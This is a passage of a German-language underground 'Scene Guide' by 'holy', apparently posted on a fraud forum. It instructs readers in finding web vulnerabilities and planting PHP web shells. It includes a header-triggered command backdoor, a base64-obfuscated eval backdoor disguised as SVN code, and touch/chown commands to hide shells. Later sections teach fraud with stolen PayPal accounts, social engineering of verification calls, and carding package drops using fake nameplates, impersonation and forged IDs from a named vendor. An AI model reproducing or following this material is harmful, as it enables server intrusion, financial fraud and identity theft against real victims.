benutzen, oder hndisch Suchen. Dazwischen gibt es nur wenig Spielraum. (Ein
Beispiel wre SE - aber das lassen wir mal auen vor)


2.1. Lcken durch Tools finden

Lcken finden mit fertigen Tools und Dorks. Fertiger Code ist zwar lame, aber
effektiv!
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy


2.1.1 Tools

Im freien Markt kann man nicht besonders viel finden, was gute Tools angeht
zum Suchen nach Lcken. Alle wirklich guten Tools sind bis auf wenige
Ausnahmen NP-Tools. Wobei ich sagen muss, dass ich persnlich nur Port
Scanner und Acunetix benutze. Wichtig ist: Vertraut nicht den Tools! Nur weil
sie sagen, es gibt keine Lcke, muss das nicht stimmen! Schaut euch immer die
Crawler Ergebnisse an und schaut noch mal hndisch ber die Variablen.
Die ntigen Tools findest du unten in der Zusammenfassung.


2.1.2. Google Dorks

Google Dorks findet man meistens schon fertig in einem Exploit. Dazu sucht ihr
auf den diversen Exploit Datenbanken nach einem Exploit und sucht dann ganz
simpel auf Google nach Seiten, die diese Software(-version) verwenden.
Der Klassiker unter den Dorks: "Powered by vBulletin"
Die ntigen Links findest du unten in der Zusammenfassung.


2.2. Lcken hndisch finden

Lcken lassen sich meistens mit einiger Erfahrung hndisch finden.


2.2.1. Theorie ber Programmierer

Wer schon einmal in einer Agentur gearbeitet hat, die grere Internetseiten
programmiert wei, unter welchem Druck die Programmierer stehen. Es ist der
reine Zeitdruck, denn Zeit ist bekanntlich Geld.
Der Mensch macht jedoch die meisten Fehler, wenn er unter Druck steht.
Somit mssen wir uns nur berlegen, wann der Auftraggeber der
Programmierung seinen Entwickler unter Druck gesetzt hat, damit dieser
schneller arbeitet.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Meine Erfahrung ist, dass dies meist der Fall ist, wenn ein "Zusatzprodukt"
gefertigt werden soll, bei dem der Programmierer denkt: "Ach, das gehrt ja
nicht zum Programmkern und muss somit nur effektiv und schnell zu fertigen
sein.". Er schreibt also seinen Code nicht gewissenhaft und sauber, sondern
schnell und praktisch. Das ist der Fehler, den wir suchen!


2.2.2. Praktisches nutzen der Fehler

Praktisch bedeutet das, dass wir nach Nebenprodukten der Hauptseite suchen.
Konkrete Beispiele wren:
- Job Brse
- Support Center
- FAQ Seite
- Jegliche Subdomains
- Filial-Finder


2.2.3. Spezial-Tipp

Nahezu jede Seite ist heute mit URL-Rewrite verschandelt. Das bedeutet fr
uns, dass wir nicht wissen, wie Variablen heien (Speziell $_GET).
ABER: Jede Seite war mal im Dev-Modus. Wir suchen also einfach nach
folgendem:

code: ".php?" site:SEITE.de
Google findet uns alte Variablen. Wenn nicht, kann das bestimmt auch
Acunetix.


2.3. Keine Lcke gefunden?

Wenn ich mal keine Lcke finde, schaue ich einfach, was fr Domains sich sonst
so auf dem Server befinden:
http://www.ip-adress.com/reverse_ip/
http://whois.webhosting.info/
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Oft bedeutet das: neue Suche, neues Glck, aber gleiches Ergebnis bei Erfolg.


3. Shells setzen

Eure Shells solltet ihr immer gut gewhlt setzen. Macht das nicht leichtfertig,
sondern berlegt euch vorher schon, was ihr wo haben wollt. Ist einmal euer
Code auf dem Server, erhht das die Chancen des Opfers enorm, Lcken sowie
Daten zu sichern.


3.1. Die richtige Shell whlen

Mal davon abgesehen, dass ich Fan von einfachen Shells bin, kennt sicher jeder
C99/R57 Shells. Diese groen Shells sind praktisch, quadratisch, gut. Aber sie
werden schnell gefunden und viele Serverbetreiber finden diese auch ber
Virensoftware.

Deshalb die 3 wichtigsten Regeln beim Shellen:
- Niemals nur eine Shell platzieren
- Niemals nur eine Art von Shell platzieren
- Niemals nur eine fertige Shell nutzen


3.1.1. Fertige Shells recoden

Ganz simpel und nicht lang erklrt:
- Shell (z.b. C99 laden)
- Shell Code decoden (im Normalfall base_64+gzdeflate)
- Shell umstrukturieren oder mindestens neue Zeichen (Kommentare)
hinzufgen
- Shell wieder codieren wie vorher


3.1.2. Eigene Shell adden

(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Baut euch eine Standalone Shell. Je nach Skills reicht eigentlich auch folgender
Code:
PHP-Code:
<?if(getenv(HTTP_BADXXX)) {@system(getenv(HTTP_BADXXX));}
else{phpinfo();}?>

3.1.3. Shell anhngen

Auerdem sollte man am besten eine Shell an eine vorhandene Datei
anhngen. Dazu reicht irgendeine PHP und ein an richtiger Stelle Platzierter
Code. Je zentraler euer Code in der normalen Datei ist, desto besser. Auerdem
solltet ihr den Code realistisch und unauffllig verpacken. Besonders wichtig
hierbei ist jedoch auch, dass ihr nachseht, wann die Datei das letzte Mal
bearbeitet wurde. Je lnger das her ist, desto besser.
Ein Beispiel fr eingefgten Code:
PHP-Code:
/* svn added code - do not change the line below */
eval(base64_decode('aWYoaXNzZXQoJF9HRVRbImJhZHNoZW
xsIl0pKWRpZShAc3lzdGVtKCRfR0VUWyJiYWRzaGVsbCJdKSk7 '));
3.2. Shells richtig verstecken

Shells sollte man richtig verstecken knnen. Nachdem ihr gecheckt habt, wie
sich die Datei von den anderen hervorhebt (check mit "ls -alF", ndert ihr alle
ntigen Infos. Dazu nutzt ihr am besten folgende Codes:
- touch: Das Datum der Datei ndern
- chown: Die Datei soll die gleichen Benutzer, wie die umliegenden haben.

Konkretes Beispiel:
Alle umliegenden Dateien wurden am 31. Januar 2002 gendert und gehren
dem Benutzer "nobody:apache".
Code:

touch -t 200201311759.30 f222_myshell_upload.jpg.php && chown
nobody:apache f222_myshell_upload.jpg.php
3.3. Sonstige Tipps

(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Achtet darauf, mglichst groe Ordner zu whlen. Setzt den Namen
dementsprechend. Am besten eigenen sich meistens Image Upload Ordner. Sie
sind meist voll und unbersichtlich. Ein "f222_foto2_upload.jpg.php" fllt nicht
weiter auf.


4. Tools

Raptor: Bearbeite Wordlisten/Combolisten professionell und schnell.
Shell Paket: Nicht besonderes. c99 neu, c99 alt, npshell, itsec, svf, mini adder.
ACHTUNG: c99 und co sind nicht repacked
Acunetix 7.0 inkl Activator: Berhmtester Vuln Scanner. Scannt Ports und
crawled.


5. Links

hurl.it: POST, GET, HEADER Informationen manipulieren/senden
whois.webhosting.info: Domains auf Server finden
ip-adress.com/reverse_ip: Domains auf Server finden
insidepro.com/hashes.php: Rausfinden, um welchen Hash es sich handelt.


6. Stellt eure Fragen!

Wenn ihr bestimmte Fragen hat, sammeln wir sie hier und beantworten sie
gemeinsam.



__________________________________________________

Ein herzliches Dank geht an einen NP-Member, der nicht erwhnt werden
mchte.

(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Ich wnsche euch viel Spa mit dem neuen Thema der RE SS und viel Erfolg
beim lernen. :)



Gre, R3volution
(c)holy (c)holy (c)holy (c)holy (c)holy
(c)holy (c)holy
(c)holy
Scene Guide Teil 8
by holy

Paypal & Ihre Verwendung

Ich habe gemerkt das viele User hier nicht mit Paypals umgehen knnen.
Deswegen habe ich mich entschieden mein Wissen public zu machen und jedes
Detail zu verraten was ich kenne.


Paypal: Verschiedene Acc-Arten in Abhngigkeit von den hinterlegten
Zahlungsdaten


Paypal unveriziert - Einfach ein Paypal Acc ohne eine verifiziertes Bankkonto
oder CC

Paypal Bank verifiziert - Ein Paypal Acc der durch ein Bankonto besttigt wurde.

Paypal CC verifiziert - Das sind Acc mit einer besttigten Kreditkarte meist auch
mit besttigten Konto aber nicht immer.

Giropay - Accs bei denen Giropay aktiviert ist , sind zwar verifiziert man kann
aber Trotzdem nicht per Lastschrift bezahlen.
Die Grnde knnen verschieden sein jedoch was fr uns Wichtig ist das solche
Acc fr uns unntzlich sind.


Der Umgang mit Paypal Accs



(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Vicsocks

Das Wichtigste bei Paypals ist der Umgang. Sprich man braucht am besten
uniqe Vicsocks oder Vsocks die nicht blacklisted sind bei Paypal.
Da sonst der Acc unwiederruflich gesperrt wird mit Sicherheitsmanahmen.
Das kann man hier checken lassen : Paypal Blacklist Check

Das zweit wichtigste ist das Geotracking des Vsocks.
Wenn man von Paypal zu Paypal berweist braucht man eine IP von der Stadt
des echten Besitzers.
Und wenn man damit einkauft braucht man eine IP von der Stadt des
Droportes.
Paypal prft das bei hheren Betrgen sehr genau.


Dann natrlich pro Vsocks nur in einen Acc einloggen sonst werden beide sehr
wahrscheinlich gesperrt.



Flashcookies

Paypal speichert und vergleich automatisch Flashcookies.
Um mit mehreren Paypals zu arbeiten muss man zwischen jedem Login die
Cookies lschen.
Zb mit dem netten Tool - FlashCookiesView.
Oder einfach im Browser.
Fr Firefox gibt es ein nettes Add-On was das speichern von Flashcookies ganz
blockiert

Was ich Persnlich immer gerne mache. Ich speicher mir die Flashcookies und
setze sie wieder rein wenn ich den Acc zum zweiten mal benutze.


Soo wenn man alles richtig befolgt steht einen netten Einkauf per Paypal nichts
mehr im Weg
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Das hier soll ein Erfahrungsaustasuch werden also bin ich fr jegliche Fragen,
Ergnzungen, Meinungen so wie Erfahrungen offen.
(c)holy (c)holy (c)holy (c)holy (c)holy
(c)holy (c)holy
(c)holy
Scene Guide Teil 9
by holy

Social Engeniering

Vorwort:
Wir beziehen uns hier nur auf Szenebedingte Manipulation und SE im Bereich
"Fraud"
Die Thematik "SE" ist immer ein bischen schwieriger zu Erklren als andere
Bereiche, aber ich versuche es so gut und versrndlich zu schreiben wie es mir
am besten gelingt.


SE
(Social Engineering)
Wikilink:
http://de.wikipedia.org/wiki/Social_...cial_Engineers



Informationen
(Grundkenntnisse)

Webseiten:
www.sicherheitskultur.at
www.social-engineer.org
www.searchsecurity.techtarget.com

Bcher:
Social Engineering in Family Matters von Burton Mittnick
Social Engineering: The Art of Human Hacking von Christopher Hadnagy
Strategy of Therapy: Torward the Engineering von George T Tate
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy

Video:
Social Engineering in der Praxis
http://www.youtube.com/watch?v=0yaG22dNYAA
http://www.youtube.com/watch?v=ybQDF...eature=related
http://www.youtube.com/watch?v=NFU8R...eature=related


Allgemeine Manipulationen von Personen

Jeder in der Szene ist merkt irgendwann das er eine Person berzeugen muss
mit SE
Zum Beispiel:

Ihr msst eine Person fr eine berweisung berzeugen
(Fillen)

Ihr msst einen Verifizierungsanruf machen
(Debit)

oder noch viele andere Situationen wo Tatsachen schaffen msst, die eigentlich
die Person nicht machen wrde.



Wenn ihr mit Vics schreiben msst oder telefonieren solltet, ist es immer
wichtig das ihr Erwachsen wirkt und euch gut ausdrcken knnt. Egal bei
welcher Art von Verifizierung oder sonstige Legitimation, bereitet ich euch
immer gut drauf vor. Macht euch eine .txt Datei mit allen ntigen
Informationen die ihr braucht und schreibt ggf. Einen kleinen Zusatz was ihr
genau machen msst, so hat man immer stets einen guten berblick ber die
aktuelle Situation.


SE am Telefon

(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Nimmt eine Anonyme Sim oder Faked euch Skype Guthaben.
Ano Sims bekommt ihr auf jedem Fraudboard fr weniger als 5 Euro, Guthaben
bei Skype knnt ich euch ganz einfach mit Random ELV Daten Faken derzeit
sind 10 Euro mglich bei erstbuchung.

Nehmen wir an ihr wollt euch eine Debit Faken wie "Neteller", hier ist es
wichtig das ihr euch alles aufschreibt was ihr beim Faken angegeben habt wie:

Vollstndige Informationen der Person (Strasse, Wohnort, Stadt)
E-Mail Adresse
Online Passwort und ggf. PIN des erstellten Accounts
Sicherheitsfrage 1 und 2 ggf. Die Antworten die man angegeben hat

Wenn ihr alle ntigen Informationen jetzt schn geordnet in einer .txt habt
knnt ihr den Anruf der jeweiligen Firma ruhig entgegen nehmen.


Der Anruf:
Wenn der Anruf kommt msst ihr drauf vorbereitet sein, das die Dame oder
Herr am anderen Ende Englisch sprechen und das nicht immer gut. Hier ist es
nicht schlimm wenn ich nicht flieendes "Buisness Englisch" knnt, wichtig ist
nur das ihr die ntigsten Kenntnisse habt um den Datenabgleich erfolgreich
durchfhren zu knnen.


Beispiel der Fragen fr die Verifizierung:

"Wie ist ihr Geburtsdatum?"
"Wofr wollen sie die Debitkarten einsetzten?"
"Nennen sie mir bitte ihre Sicherheitsfrage und ggf. Antwort"
"Welche Limits wrden sie bentigen, wie viel Geld wird transferiert von der
Debit?"
"Bitte nennen sie mir ihe Anschrift und ihre Bank"

Es gibt kein "Muster Erfolgsrezept" aber man muss auf die allgemeinen Dinge
beachten die bei solch einem Telefonat wichtig sind. Bedenkt immer stets
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Selbsbewusst reden und nicht lange versuchen alles in die Lnge zu ziehen,
guckt auf eure Daten die ihr gespeichert habt und vollzieht den Datenabgleich
ab ganz normal wie jeder andere Mensch auch.



HD (Hausdrop)

Viele User die sich mit dem Carding beschftigen kommen wohl oder belst
zum Part des Droppens, mit der richtigen Methode und Grundeinstellung
werdet ihr das Paket abfangen und ohne Probleme wieder vom Drop gehen
ohne einen Bust.

Dabei muss man erstmal unterscheiden was fr eine Art von HD Drop man
besitzt

Leerstehendes Haus mit prpariertem Namenschild
Bewohntes Haus mit mehreren Partein
Paketshop (Kiosk, Wettbro, oder sonstige)

Natrlich gibt es noch mehr Varianten von HD Drops, aber ich beziehe mich nur
auf die da ich glaube das sind die wichtigsten Arten. Egal welche Variante von
Drop ihr besitzt einen Satz msst ihr euch immer wieder bewusst vor Augen
halten:

"Sei Selbstbewusst und bringe nie deine Real Daten mit ins Spiel"

Der satz klingt vielleicht ein bischen daher gesagt, aber glaubt mir es passiert so
schnell das man sich versabbelt vor einem Boten oder sonstige Fehler macht.

Gehen wir jetzt nher ein auf die Art und Weise des Droppens von den
verschiedenen Varationen:

Leerstehendes Haus mit prpariertem Namenschild
Erklrung: Ihr habt ein Haus gefunden in einer guten Lage was nicht bewohnt
ist.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy

Vorgehensweise:
Wenn ihr bei "www.Amazon.de" gecardet habt, und ihr habt als CC den Namen
"Peter Meier" genommen msst ihr auch am Klingelschild sowie Briefkasten
den Namen "Peter Meier" anbirngen. Achtet immer darauf das es kein 0815
Zettel ist, sondern ein ganz normales selbstklebendes Schild ist mit gute
lesbarer Schrift .
Es ist kein muss aber bedenkt immer die Situation muss so aussehen als wrdet
ihr da wohnen und ganz normal auf euer Paket warten.

Jetzt habt ihr das Schild angebracht und eure Tracking ID (Sendungsnummer)
zeigt euch das euer Paket unterwegs ist.
Viele knnen nicht einschtzen wann das Paket kommt aber die Faustregel
lautet:

"Ist es Werktags und die Tracking ist auf 60%, kommt das Paket am selben oder
nchsten Folgetag"

Ich verweise hier auf die DHL Homepage:
http://www.dhl.de/content/de/de/pake...erfolgung.html

Sagen wir ihr wisst jetzt das euer Paket nchsten Werktag kommt und ihr habet
alles vorbereitet so das ihr nur noch Droppen msst. Hier gilt

"Vorbereitung ist die halbe Miete"

Die meisten Busts am HD kommen durch unachtsamkeit und zu schlechte
Vorbereitung.

Der Moment des Droppens:
Meine Empfehlung wartet im Treppenhaus unten, wenn ihr den Postboten seht
geht ihr genau in dem Moment raus wo er gerade auf dem Weg zum HD ist. Ihr
holt euer Handy raus und gaukelt ihm vor das ihr Telefoniert, macht einen
hektische Eindruck und tut so als httet ihr kaum Zeit.

Geht selbstbewusst auf den Boten zu und fragt:
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
"Ist ein Paket fr Meier zufllig dabei?"

Der Postbote antwortet meistens:
"Ja habe ich, sind sie Herr Meier?"

Eure Antwort wird sein:
"Ja bin ich, tut mir leid bin gerade sehr im Stress und muss schnell zur Arbeit da
ich zpt dran bin"

Der Postbote wird euch seinen PDA in die Hand drcken und sagen ihr msst
unterschreiben, hier ist es sehr wichtig das ihr nicht irgendeinen Unterschrift
gibt sondern ihr msst als "Peter Meier" Unterschreiben damit es
vertrauensvoll wirkt und kein Verdacht geschpft wird.


Bewohntes Haus mit mehreren Partein
Erkrung: Ein 4 Partein Haus wo eine Wohnung leersteht und ein Namensschild
angebracht werden kann.

Vorgehensweise:
Ich wrde den HD vorher morgens frh ein wenig beobachten und gucken
wann die Bewohner arbeiten gehen oder was sie fr feste Tagesablufe haben.
Achtet dabei immer darauf das ihr sauber und unaufllig arbeitet. Wenn ihr die
gewohnheiten der Mitbewohner ausgespht habt knnt ihr erstmal Carden.
Wenn ihr nun wisst wann das Paket kommt, geht ihr morgens zum Drop an
dem das Paket ankommen sollt. Ihr befestigt das Namensschild am Brifkasten
und an der Klingel.

Erinnert euch: "Vorbereitung ist die halbe Miete"

Tip: Sollte es vorkommen das ein Nachbar euch sieht, und fragt was ihr hier
macht erschreckt euch nicht bleibt in diesem Moment Selbstbewusst und
kommt offen rber!
Erklrt der Person das ihr die neuen Nachbarn seit und begrt ihr mit einem
Hndedruck und sagt euren Namen (Vicname)

(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Der Moment des Droppens
Ihr knntet jetzt die Methode bei Nr. 1 verwenden, aber diese klappt nur zu
50% da noch andere Personen mit im Haus sind und ihr knntet erwischt
werden.
Hier wrde ich euch empfehlen entweder:

"Abwarten und nicht Droppen (Weil die Postboten zu 80% das Paket beim
Nachbarn abgeben)"
oder
"Vorher Abfangen und das Paket ganz normal entgegen nehmen,
unterschreiben und Weg"
Paketshop (Kiosk, Wettbro, oder sonstige)
Erklrung: Ihr habt ein Geschft gefunden was einen Paketannahme Service
anbietet, meistens fr die Dienstleister "HERMES" oder "DHL"

Vorgehensweise:
Es gibt einige Shops wie zum Beispiel: "OTTO" die mit Hermes versenden, Diese
Pakete knnt ihr auf einen Kiosk Carden oder sonstiges Geschft was Pakete
entgegen nimmt.
Ihr Cardet bei OTTO und macht ein Kreuz bei "Abweichender Lieferadresse"
hin, dann whlt ihr die Sektion "Paketshops" aus. Nimmt einen Paketshop eurer
Wahl und fgt diesen als Lieferadresse ein. Man braucht fr diese Art des
Droppens meistens einen "Faked Perso (Plastic)".
Das bleibt euch berlassen wo ihr den besorgt, aber achtet immer darauf das
eine entsprechende Qualitt gegeben sein muss.

Tip: Es gibt einen Vendor auf "www.Russian-elite.net" der Faked Passes
verkauft Name: "IDMaker"

Der Moment des Droppens:
Wir gehen jetzt mal davon aus, das ihr einen Perso habt und das Paket
angekommen ist im Paketshop. Ihr geht am besten mit Kapuzze und Mtze in
den Laden und vermeidet groartigen Augenkontakt mit der
berwachungskamera.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Geht Selbstbewusst zur Mitarbeitern und sagt ein Paket ist fr mich ankommen
und ich wrde es gerne abholen, gibt ihr ganz einfach den Perso und sie wird
euch das Paket in die Hand drcken